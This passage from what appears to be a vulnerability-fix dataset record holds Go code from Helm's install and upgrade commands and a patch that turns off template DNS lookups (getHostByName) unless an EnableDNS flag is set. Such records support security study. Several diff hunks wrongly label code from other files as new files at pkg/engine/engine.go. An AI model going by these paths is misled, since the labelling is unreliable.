You may need to run `helm dependency build` to fetch missing dependencies\")\n\t\t\t\t\tif client.DependencyUpdate {\n\t\t\t\t\t\tman := &downloader.Manager{\n\t\t\t\t\t\t\tOut: out,\n\t\t\t\t\t\t\tChartPath: chartPath,\n\t\t\t\t\t\t\tKeyring: client.ChartPathOptions.Keyring,\n\t\t\t\t\t\t\tSkipUpdate: false,\n\t\t\t\t\t\t\tGetters: p,\n\t\t\t\t\t\t\tRepositoryConfig: settings.RepositoryConfig,\n\t\t\t\t\t\t\tRepositoryCache: settings.RepositoryCache,\n\t\t\t\t\t\t\tDebug: settings.Debug,\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif err := man.Update(); err != nil {\n\t\t\t\t\t\t\treturn err\n\t\t\t\t\t\t}\n\t\t\t\t\t\t// Reload the chart with the updated Chart.lock file.\n\t\t\t\t\t\tif ch, err = loader.Load(chartPath); err != nil {\n\t\t\t\t\t\t\treturn errors.Wrap(err, \"failed reloading chart after repo update\")\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif ch.Metadata.Deprecated {\n\t\t\t\twarning(\"This chart is deprecated\")\n\t\t\t}\n\n\t\t\t// Create context and prepare the handle of SIGTERM\n\t\t\tctx := context.Background()\n\t\t\tctx, cancel := context.WithCancel(ctx)\n\n\t\t\t// Set up channel on which to send signal notifications.\n\t\t\t// We must use a buffered channel or risk missing the signal\n\t\t\t// if we're not ready to receive when the signal is sent.\n\t\t\tcSignal := make(chan os.Signal, 2)\n\t\t\tsignal.Notify(cSignal, os.Interrupt, syscall.SIGTERM)\n\t\t\tgo func() {\n\t\t\t\t<-cSignal\n\t\t\t\tfmt.Fprintf(out, \"Release %s has been cancelled.\\n\", args[0])\n\t\t\t\tcancel()\n\t\t\t}()\n\n\t\t\trel, err := client.RunWithContext(ctx, args[0], ch, vals)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"UPGRADE FAILED\")\n\t\t\t}\n\n\t\t\tif outfmt == output.Table {\n\t\t\t\tfmt.Fprintf(out, \"Release %q has been upgraded. Happy Helming!\\n\", args[0])\n\t\t\t}\n\n\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n\t\t},\n\t}\n\n\tf := cmd.Flags()\n\tf.BoolVar(&createNamespace, \"create-namespace\", false, \"if --install is set, create the release namespace if not present\")\n\tf.BoolVarP(&client.Install, \"install\", \"i\", false, \"if a release by this name doesn't already exist, run an install\")\n\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an upgrade\")\n\tf.BoolVar(&client.Recreate, \"recreate-pods\", false, \"performs pods restart for the resource if applicable\")\n\tf.MarkDeprecated(\"recreate-pods\", \"functionality will no longer be updated. Consult the documentation for other methods to recreate pods\")\n\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"disable pre/post upgrade hooks\")\n\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the upgrade process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed when an upgrade is performed with install flag enabled. 
By default, CRDs are installed if not already present, when an upgrade is performed with install flag enabled\")\n\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n\tf.BoolVar(&client.ResetValues, \"reset-values\", false, \"when upgrading, reset the values to the ones built into the chart\")\n\tf.BoolVar(&client.ReuseValues, \"reuse-values\", false, \"when upgrading, reuse the last release's values and merge in any overrides from the command line via --set and -f. If '--reset-values' is specified, this is ignored\")\n\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, upgrade process rolls back changes made in case of failed upgrade. The --wait flag will be set automatically if --atomic is used\")\n\tf.IntVar(&client.MaxHistory, \"history-max\", settings.MaxHistory, \"limit the maximum number of revisions saved per release. Use 0 for no limit\")\n\tf.BoolVar(&client.CleanupOnFail, \"cleanup-on-fail\", false, \"allow deletion of new resources created in this upgrade when upgrade fails\")\n\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n\taddValueOptionsFlags(f, valueOpts)\n\tbindOutputFlag(cmd, &outfmt)\n\tbindPostRenderFlag(cmd, &client.PostRenderer)\n\n\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n\t\tif len(args) != 2 {\n\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n\t\t}\n\t\treturn compVersionFlag(args[1], toComplete)\n\t})\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn cmd\n}"}, {"id": "fix_go_49_9", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "cmd/helm/install.go", "start_line": 155, "end_line": 191, "snippet": "func addInstallFlags(cmd *cobra.Command, f *pflag.FlagSet, client *action.Install, valueOpts *values.Options) {\n\tf.BoolVar(&client.CreateNamespace, \"create-namespace\", false, \"create the release namespace if not present\")\n\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an install\")\n\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"prevent hooks from running during install\")\n\tf.BoolVar(&client.Replace, \"replace\", false, \"re-use the given name, only if that name is a deleted release which remains in the history. 
This is unsafe in production\")\n\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVarP(&client.GenerateName, \"generate-name\", \"g\", false, \"generate the name (and omit the NAME parameter)\")\n\tf.StringVar(&client.NameTemplate, \"name-template\", \"\", \"specify template used to name the release\")\n\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, the installation process deletes the installation on failure. The --wait flag will be set automatically if --atomic is used\")\n\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed. By default, CRDs are installed if not already present\")\n\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n\taddValueOptionsFlags(f, valueOpts)\n\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n\n\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n\t\trequiredArgs := 2\n\t\tif client.GenerateName {\n\t\t\trequiredArgs = 1\n\t\t}\n\t\tif len(args) != requiredArgs {\n\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n\t\t}\n\t\treturn compVersionFlag(args[requiredArgs-1], toComplete)\n\t})\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}"}], "vul_patch": "--- a/pkg/engine/engine.go\n+++ b/pkg/engine/engine.go\n@@ -6,4 +6,13 @@\n \tLintMode bool\n \t// the rest config to connect to the kubernetes api\n \tconfig *rest.Config\n+\t// EnableDNS tells the engine to allow DNS lookups when rendering templates\n+\tEnableDNS bool\n }\n+\n+// New creates a new instance of Engine using the passed in rest config.\n+func New(config *rest.Config) Engine {\n+\treturn Engine{\n+\t\tconfig: config,\n+\t}\n+}\n\n--- a/pkg/engine/engine.go\n+++ b/pkg/engine/engine.go\n@@ -83,5 +83,13 @@\n \t\tfuncMap[\"lookup\"] = NewLookupFunction(e.config)\n \t}\n \n+\t// When DNS lookups are not enabled override the sprig function and return\n+\t// an empty string.\n+\tif !e.EnableDNS {\n+\t\tfuncMap[\"getHostByName\"] = func(name string) string {\n+\t\t\treturn \"\"\n+\t\t}\n+\t}\n+\n \tt.Funcs(funcMap)\n }\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,66 @@\n+type Upgrade struct {\n+\tcfg 
*Configuration\n+\n+\tChartPathOptions\n+\n+\t// Install is a purely informative flag that indicates whether this upgrade was done in \"install\" mode.\n+\t//\n+\t// Applications may use this to determine whether this Upgrade operation was done as part of a\n+\t// pure upgrade (Upgrade.Install == false) or as part of an install-or-upgrade operation\n+\t// (Upgrade.Install == true).\n+\t//\n+\t// Setting this to `true` will NOT cause `Upgrade` to perform an install if the release does not exist.\n+\t// That process must be handled by creating an Install action directly. See cmd/upgrade.go for an\n+\t// example of how this flag is used.\n+\tInstall bool\n+\t// Devel indicates that the operation is done in devel mode.\n+\tDevel bool\n+\t// Namespace is the namespace in which this operation should be performed.\n+\tNamespace string\n+\t// SkipCRDs skips installing CRDs when install flag is enabled during upgrade\n+\tSkipCRDs bool\n+\t// Timeout is the timeout for this operation\n+\tTimeout time.Duration\n+\t// Wait determines whether the wait operation should be performed after the upgrade is requested.\n+\tWait bool\n+\t// WaitForJobs determines whether the wait operation for the Jobs should be performed after the upgrade is requested.\n+\tWaitForJobs bool\n+\t// DisableHooks disables hook processing if set to true.\n+\tDisableHooks bool\n+\t// DryRun controls whether the operation is prepared, but not executed.\n+\t// If `true`, the upgrade is prepared but not performed.\n+\tDryRun bool\n+\t// Force will, if set to `true`, ignore certain warnings and perform the upgrade anyway.\n+\t//\n+\t// This should be used with caution.\n+\tForce bool\n+\t// ResetValues will reset the values to the chart's built-ins rather than merging with existing.\n+\tResetValues bool\n+\t// ReuseValues will re-use the user's last supplied values.\n+\tReuseValues bool\n+\t// Recreate will (if true) recreate pods after a rollback.\n+\tRecreate bool\n+\t// MaxHistory limits the maximum number of revisions saved per release\n+\tMaxHistory int\n+\t// Atomic, if true, will roll back on failure.\n+\tAtomic bool\n+\t// CleanupOnFail will, if true, cause the upgrade to delete newly-created resources on a failed update.\n+\tCleanupOnFail bool\n+\t// SubNotes determines whether sub-notes are rendered in the chart.\n+\tSubNotes bool\n+\t// Description is the description of this operation\n+\tDescription string\n+\t// PostRender is an optional post-renderer\n+\t//\n+\t// If this is non-nil, then after templates are rendered, they will be sent to the\n+\t// post renderer before sending to the Kubernetes API server.\n+\tPostRenderer postrender.PostRenderer\n+\t// DisableOpenAPIValidation controls whether OpenAPI validation is enforced.\n+\tDisableOpenAPIValidation bool\n+\t// Get missing dependencies\n+\tDependencyUpdate bool\n+\t// Lock to control raceconditions when the process receives a SIGTERM\n+\tLock sync.Mutex\n+\t// Enable DNS lookups when rendering templates\n+\tEnableDNS bool\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,95 @@\n+func (u *Upgrade) prepareUpgrade(name string, chart *chart.Chart, vals map[string]interface{}) (*release.Release, *release.Release, error) {\n+\tif chart == nil {\n+\t\treturn nil, nil, errMissingChart\n+\t}\n+\n+\t// finds the last non-deleted release with the given name\n+\tlastRelease, err := u.cfg.Releases.Last(name)\n+\tif err != nil {\n+\t\t// to keep existing behavior of returning the \"%q has no deployed releases\" error when an existing release does not exist\n+\t\tif 
errors.Is(err, driver.ErrReleaseNotFound) {\n+\t\t\treturn nil, nil, driver.NewErrNoDeployedReleases(name)\n+\t\t}\n+\t\treturn nil, nil, err\n+\t}\n+\n+\t// Concurrent `helm upgrade`s will either fail here with `errPending` or when creating the release with \"already exists\". This should act as a pessimistic lock.\n+\tif lastRelease.Info.Status.IsPending() {\n+\t\treturn nil, nil, errPending\n+\t}\n+\n+\tvar currentRelease *release.Release\n+\tif lastRelease.Info.Status == release.StatusDeployed {\n+\t\t// no need to retrieve the last deployed release from storage as the last release is deployed\n+\t\tcurrentRelease = lastRelease\n+\t} else {\n+\t\t// finds the deployed release with the given name\n+\t\tcurrentRelease, err = u.cfg.Releases.Deployed(name)\n+\t\tif err != nil {\n+\t\t\tif errors.Is(err, driver.ErrNoDeployedReleases) &&\n+\t\t\t\t(lastRelease.Info.Status == release.StatusFailed || lastRelease.Info.Status == release.StatusSuperseded) {\n+\t\t\t\tcurrentRelease = lastRelease\n+\t\t\t} else {\n+\t\t\t\treturn nil, nil, err\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\t// determine if values will be reused\n+\tvals, err = u.reuseValues(chart, currentRelease, vals)\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\tif err := chartutil.ProcessDependencies(chart, vals); err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\t// Increment revision count. This is passed to templates, and also stored on\n+\t// the release object.\n+\trevision := lastRelease.Version + 1\n+\n+\toptions := chartutil.ReleaseOptions{\n+\t\tName: name,\n+\t\tNamespace: currentRelease.Namespace,\n+\t\tRevision: revision,\n+\t\tIsUpgrade: true,\n+\t}\n+\n+\tcaps, err := u.cfg.getCapabilities()\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\tvaluesToRender, err := chartutil.ToRenderValues(chart, vals, options, caps)\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\thooks, manifestDoc, notesTxt, err := u.cfg.renderResources(chart, valuesToRender, \"\", \"\", u.SubNotes, false, false, u.PostRenderer, u.DryRun, u.EnableDNS)\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\t// Store an upgraded release.\n+\tupgradedRelease := &release.Release{\n+\t\tName: name,\n+\t\tNamespace: currentRelease.Namespace,\n+\t\tChart: chart,\n+\t\tConfig: vals,\n+\t\tInfo: &release.Info{\n+\t\t\tFirstDeployed: currentRelease.Info.FirstDeployed,\n+\t\t\tLastDeployed: Timestamper(),\n+\t\t\tStatus: release.StatusPendingUpgrade,\n+\t\t\tDescription: \"Preparing upgrade\", // This should be overwritten later.\n+\t\t},\n+\t\tVersion: revision,\n+\t\tManifest: manifestDoc.String(),\n+\t\tHooks: hooks,\n+\t}\n+\n+\tif len(notesTxt) > 0 {\n+\t\tupgradedRelease.Info.Notes = notesTxt\n+\t}\n+\terr = validateManifest(u.cfg.KubeClient, manifestDoc.Bytes(), !u.DisableOpenAPIValidation)\n+\treturn currentRelease, upgradedRelease, err\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,43 @@\n+type Install struct {\n+\tcfg *Configuration\n+\n+\tChartPathOptions\n+\n+\tClientOnly bool\n+\tForce bool\n+\tCreateNamespace bool\n+\tDryRun bool\n+\tDisableHooks bool\n+\tReplace bool\n+\tWait bool\n+\tWaitForJobs bool\n+\tDevel bool\n+\tDependencyUpdate bool\n+\tTimeout time.Duration\n+\tNamespace string\n+\tReleaseName string\n+\tGenerateName bool\n+\tNameTemplate string\n+\tDescription string\n+\tOutputDir string\n+\tAtomic bool\n+\tSkipCRDs bool\n+\tSubNotes bool\n+\tDisableOpenAPIValidation bool\n+\tIncludeCRDs bool\n+\t// KubeVersion allows specifying a custom kubernetes version to use and\n+\t// APIVersions allows a 
manual set of supported API Versions to be passed\n+\t// (for things like templating). These are ignored if ClientOnly is false\n+\tKubeVersion *chartutil.KubeVersion\n+\tAPIVersions chartutil.VersionSet\n+\t// Used by helm template to render charts with .Release.IsUpgrade. Ignored if Dry-Run is false\n+\tIsUpgrade bool\n+\t// Enable DNS lookups when rendering templates\n+\tEnableDNS bool\n+\t// Used by helm template to add the release as part of OutputDir path\n+\t// OutputDir/\n+\tUseReleaseName bool\n+\tPostRenderer postrender.PostRenderer\n+\t// Lock to control raceconditions when the process receives a SIGTERM\n+\tLock sync.Mutex\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,166 @@\n+func (i *Install) RunWithContext(ctx context.Context, chrt *chart.Chart, vals map[string]interface{}) (*release.Release, error) {\n+\t// Check reachability of cluster unless in client-only mode (e.g. `helm template` without `--validate`)\n+\tif !i.ClientOnly {\n+\t\tif err := i.cfg.KubeClient.IsReachable(); err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\tif err := i.availableName(); err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\tif err := chartutil.ProcessDependencies(chrt, vals); err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\t// Pre-install anything in the crd/ directory. We do this before Helm\n+\t// contacts the upstream server and builds the capabilities object.\n+\tif crds := chrt.CRDObjects(); !i.ClientOnly && !i.SkipCRDs && len(crds) > 0 {\n+\t\t// On dry run, bail here\n+\t\tif i.DryRun {\n+\t\t\ti.cfg.Log(\"WARNING: This chart or one of its subcharts contains CRDs. Rendering may fail or contain inaccuracies.\")\n+\t\t} else if err := i.installCRDs(crds); err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\tif i.ClientOnly {\n+\t\t// Add mock objects in here so it doesn't use Kube API server\n+\t\t// NOTE(bacongobbler): used for `helm template`\n+\t\ti.cfg.Capabilities = chartutil.DefaultCapabilities.Copy()\n+\t\tif i.KubeVersion != nil {\n+\t\t\ti.cfg.Capabilities.KubeVersion = *i.KubeVersion\n+\t\t}\n+\t\ti.cfg.Capabilities.APIVersions = append(i.cfg.Capabilities.APIVersions, i.APIVersions...)\n+\t\ti.cfg.KubeClient = &kubefake.PrintingKubeClient{Out: ioutil.Discard}\n+\n+\t\tmem := driver.NewMemory()\n+\t\tmem.SetNamespace(i.Namespace)\n+\t\ti.cfg.Releases = storage.Init(mem)\n+\t} else if !i.ClientOnly && len(i.APIVersions) > 0 {\n+\t\ti.cfg.Log(\"API Version list given outside of client only mode, this list will be ignored\")\n+\t}\n+\n+\t// Make sure if Atomic is set, that wait is set as well. 
This makes it so\n+\t// the user doesn't have to specify both\n+\ti.Wait = i.Wait || i.Atomic\n+\n+\tcaps, err := i.cfg.getCapabilities()\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\t// special case for helm template --is-upgrade\n+\tisUpgrade := i.IsUpgrade && i.DryRun\n+\toptions := chartutil.ReleaseOptions{\n+\t\tName: i.ReleaseName,\n+\t\tNamespace: i.Namespace,\n+\t\tRevision: 1,\n+\t\tIsInstall: !isUpgrade,\n+\t\tIsUpgrade: isUpgrade,\n+\t}\n+\tvaluesToRender, err := chartutil.ToRenderValues(chrt, vals, options, caps)\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\trel := i.createRelease(chrt, vals)\n+\n+\tvar manifestDoc *bytes.Buffer\n+\trel.Hooks, manifestDoc, rel.Info.Notes, err = i.cfg.renderResources(chrt, valuesToRender, i.ReleaseName, i.OutputDir, i.SubNotes, i.UseReleaseName, i.IncludeCRDs, i.PostRenderer, i.DryRun, i.EnableDNS)\n+\t// Even for errors, attach this if available\n+\tif manifestDoc != nil {\n+\t\trel.Manifest = manifestDoc.String()\n+\t}\n+\t// Check error from render\n+\tif err != nil {\n+\t\trel.SetStatus(release.StatusFailed, fmt.Sprintf(\"failed to render resource: %s\", err.Error()))\n+\t\t// Return a release with partial data so that the client can show debugging information.\n+\t\treturn rel, err\n+\t}\n+\n+\t// Mark this release as in-progress\n+\trel.SetStatus(release.StatusPendingInstall, \"Initial install underway\")\n+\n+\tvar toBeAdopted kube.ResourceList\n+\tresources, err := i.cfg.KubeClient.Build(bytes.NewBufferString(rel.Manifest), !i.DisableOpenAPIValidation)\n+\tif err != nil {\n+\t\treturn nil, errors.Wrap(err, \"unable to build kubernetes objects from release manifest\")\n+\t}\n+\n+\t// It is safe to use \"force\" here because these are resources currently rendered by the chart.\n+\terr = resources.Visit(setMetadataVisitor(rel.Name, rel.Namespace, true))\n+\tif err != nil {\n+\t\treturn nil, err\n+\t}\n+\n+\t// Install requires an extra validation step of checking that resources\n+\t// don't already exist before we actually create resources. If we continue\n+\t// forward and create the release object with resources that already exist,\n+\t// we'll end up in a state where we will delete those resources upon\n+\t// deleting the release because the manifest will be pointing at that\n+\t// resource\n+\tif !i.ClientOnly && !isUpgrade && len(resources) > 0 {\n+\t\ttoBeAdopted, err = existingResourceConflict(resources, rel.Name, rel.Namespace)\n+\t\tif err != nil {\n+\t\t\treturn nil, errors.Wrap(err, \"rendered manifests contain a resource that already exists. 
Unable to continue with install\")\n+\t\t}\n+\t}\n+\n+\t// Bail out here if it is a dry run\n+\tif i.DryRun {\n+\t\trel.Info.Description = \"Dry run complete\"\n+\t\treturn rel, nil\n+\t}\n+\n+\tif i.CreateNamespace {\n+\t\tns := &v1.Namespace{\n+\t\t\tTypeMeta: metav1.TypeMeta{\n+\t\t\t\tAPIVersion: \"v1\",\n+\t\t\t\tKind: \"Namespace\",\n+\t\t\t},\n+\t\t\tObjectMeta: metav1.ObjectMeta{\n+\t\t\t\tName: i.Namespace,\n+\t\t\t\tLabels: map[string]string{\n+\t\t\t\t\t\"name\": i.Namespace,\n+\t\t\t\t},\n+\t\t\t},\n+\t\t}\n+\t\tbuf, err := yaml.Marshal(ns)\n+\t\tif err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t\tresourceList, err := i.cfg.KubeClient.Build(bytes.NewBuffer(buf), true)\n+\t\tif err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t\tif _, err := i.cfg.KubeClient.Create(resourceList); err != nil && !apierrors.IsAlreadyExists(err) {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\t// If Replace is true, we need to supercede the last release.\n+\tif i.Replace {\n+\t\tif err := i.replaceRelease(rel); err != nil {\n+\t\t\treturn nil, err\n+\t\t}\n+\t}\n+\n+\t// Store the release in history before continuing (new in Helm 3). We always know\n+\t// that this is a create operation.\n+\tif err := i.cfg.Releases.Create(rel); err != nil {\n+\t\t// We could try to recover gracefully here, but since nothing has been installed\n+\t\t// yet, this is probably safer than trying to continue when we know storage is\n+\t\t// not working.\n+\t\treturn rel, err\n+\t}\n+\trChan := make(chan resultMessage)\n+\tdoneChan := make(chan struct{})\n+\tdefer close(doneChan)\n+\tgo i.performInstall(rChan, rel, toBeAdopted, resources)\n+\tgo i.handleContext(ctx, rChan, doneChan, rel)\n+\tresult := <-rChan\n+\t//start preformInstall go routine\n+\treturn result.r, result.e\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,126 @@\n+func (cfg *Configuration) renderResources(ch *chart.Chart, values chartutil.Values, releaseName, outputDir string, subNotes, useReleaseName, includeCrds bool, pr postrender.PostRenderer, dryRun, enableDNS bool) ([]*release.Hook, *bytes.Buffer, string, error) {\n+\ths := []*release.Hook{}\n+\tb := bytes.NewBuffer(nil)\n+\n+\tcaps, err := cfg.getCapabilities()\n+\tif err != nil {\n+\t\treturn hs, b, \"\", err\n+\t}\n+\n+\tif ch.Metadata.KubeVersion != \"\" {\n+\t\tif !chartutil.IsCompatibleRange(ch.Metadata.KubeVersion, caps.KubeVersion.String()) {\n+\t\t\treturn hs, b, \"\", errors.Errorf(\"chart requires kubeVersion: %s which is incompatible with Kubernetes %s\", ch.Metadata.KubeVersion, caps.KubeVersion.String())\n+\t\t}\n+\t}\n+\n+\tvar files map[string]string\n+\tvar err2 error\n+\n+\t// A `helm template` or `helm install --dry-run` should not talk to the remote cluster.\n+\t// It will break in interesting and exotic ways because other data (e.g. discovery)\n+\t// is mocked. It is not up to the template author to decide when the user wants to\n+\t// connect to the cluster. 
So when the user says to dry run, respect the user's\n+\t// wishes and do not connect to the cluster.\n+\tif !dryRun && cfg.RESTClientGetter != nil {\n+\t\trestConfig, err := cfg.RESTClientGetter.ToRESTConfig()\n+\t\tif err != nil {\n+\t\t\treturn hs, b, \"\", err\n+\t\t}\n+\t\te := engine.New(restConfig)\n+\t\te.EnableDNS = enableDNS\n+\t\tfiles, err2 = e.Render(ch, values)\n+\t} else {\n+\t\tvar e engine.Engine\n+\t\te.EnableDNS = enableDNS\n+\t\tfiles, err2 = e.Render(ch, values)\n+\t}\n+\n+\tif err2 != nil {\n+\t\treturn hs, b, \"\", err2\n+\t}\n+\n+\t// NOTES.txt gets rendered like all the other files, but because it's not a hook nor a resource,\n+\t// pull it out of here into a separate file so that we can actually use the output of the rendered\n+\t// text file. We have to spin through this map because the file contains path information, so we\n+\t// look for terminating NOTES.txt. We also remove it from the files so that we don't have to skip\n+\t// it in the sortHooks.\n+\tvar notesBuffer bytes.Buffer\n+\tfor k, v := range files {\n+\t\tif strings.HasSuffix(k, notesFileSuffix) {\n+\t\t\tif subNotes || (k == path.Join(ch.Name(), \"templates\", notesFileSuffix)) {\n+\t\t\t\t// If buffer contains data, add newline before adding more\n+\t\t\t\tif notesBuffer.Len() > 0 {\n+\t\t\t\t\tnotesBuffer.WriteString(\"\\n\")\n+\t\t\t\t}\n+\t\t\t\tnotesBuffer.WriteString(v)\n+\t\t\t}\n+\t\t\tdelete(files, k)\n+\t\t}\n+\t}\n+\tnotes := notesBuffer.String()\n+\n+\t// Sort hooks, manifests, and partials. Only hooks and manifests are returned,\n+\t// as partials are not used after renderer.Render. Empty manifests are also\n+\t// removed here.\n+\ths, manifests, err := releaseutil.SortManifests(files, caps.APIVersions, releaseutil.InstallOrder)\n+\tif err != nil {\n+\t\t// By catching parse errors here, we can prevent bogus releases from going\n+\t\t// to Kubernetes.\n+\t\t//\n+\t\t// We return the files as a big blob of data to help the user debug parser\n+\t\t// errors.\n+\t\tfor name, content := range files {\n+\t\t\tif strings.TrimSpace(content) == \"\" {\n+\t\t\t\tcontinue\n+\t\t\t}\n+\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", name, content)\n+\t\t}\n+\t\treturn hs, b, \"\", err\n+\t}\n+\n+\t// Aggregate all valid manifests into one big doc.\n+\tfileWritten := make(map[string]bool)\n+\n+\tif includeCrds {\n+\t\tfor _, crd := range ch.CRDObjects() {\n+\t\t\tif outputDir == \"\" {\n+\t\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", crd.Name, string(crd.File.Data[:]))\n+\t\t\t} else {\n+\t\t\t\terr = writeToFile(outputDir, crd.Filename, string(crd.File.Data[:]), fileWritten[crd.Name])\n+\t\t\t\tif err != nil {\n+\t\t\t\t\treturn hs, b, \"\", err\n+\t\t\t\t}\n+\t\t\t\tfileWritten[crd.Name] = true\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tfor _, m := range manifests {\n+\t\tif outputDir == \"\" {\n+\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", m.Name, m.Content)\n+\t\t} else {\n+\t\t\tnewDir := outputDir\n+\t\t\tif useReleaseName {\n+\t\t\t\tnewDir = filepath.Join(outputDir, releaseName)\n+\t\t\t}\n+\t\t\t// NOTE: We do not have to worry about the post-renderer because\n+\t\t\t// output dir is only used by `helm template`. 
In the next major\n+\t\t\t// release, we should move this logic to template only as it is not\n+\t\t\t// used by install or upgrade\n+\t\t\terr = writeToFile(newDir, m.Name, m.Content, fileWritten[m.Name])\n+\t\t\tif err != nil {\n+\t\t\t\treturn hs, b, \"\", err\n+\t\t\t}\n+\t\t\tfileWritten[m.Name] = true\n+\t\t}\n+\t}\n+\n+\tif pr != nil {\n+\t\tb, err = pr.Run(b)\n+\t\tif err != nil {\n+\t\t\treturn hs, b, notes, errors.Wrap(err, \"error while running post render on files\")\n+\t\t}\n+\t}\n+\n+\treturn hs, b, notes, nil\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,185 @@\n+func newUpgradeCmd(cfg *action.Configuration, out io.Writer) *cobra.Command {\n+\tclient := action.NewUpgrade(cfg)\n+\tvalueOpts := &values.Options{}\n+\tvar outfmt output.Format\n+\tvar createNamespace bool\n+\n+\tcmd := &cobra.Command{\n+\t\tUse: \"upgrade [RELEASE] [CHART]\",\n+\t\tShort: \"upgrade a release\",\n+\t\tLong: upgradeDesc,\n+\t\tArgs: require.ExactArgs(2),\n+\t\tValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n+\t\t\tif len(args) == 0 {\n+\t\t\t\treturn compListReleases(toComplete, args, cfg)\n+\t\t\t}\n+\t\t\tif len(args) == 1 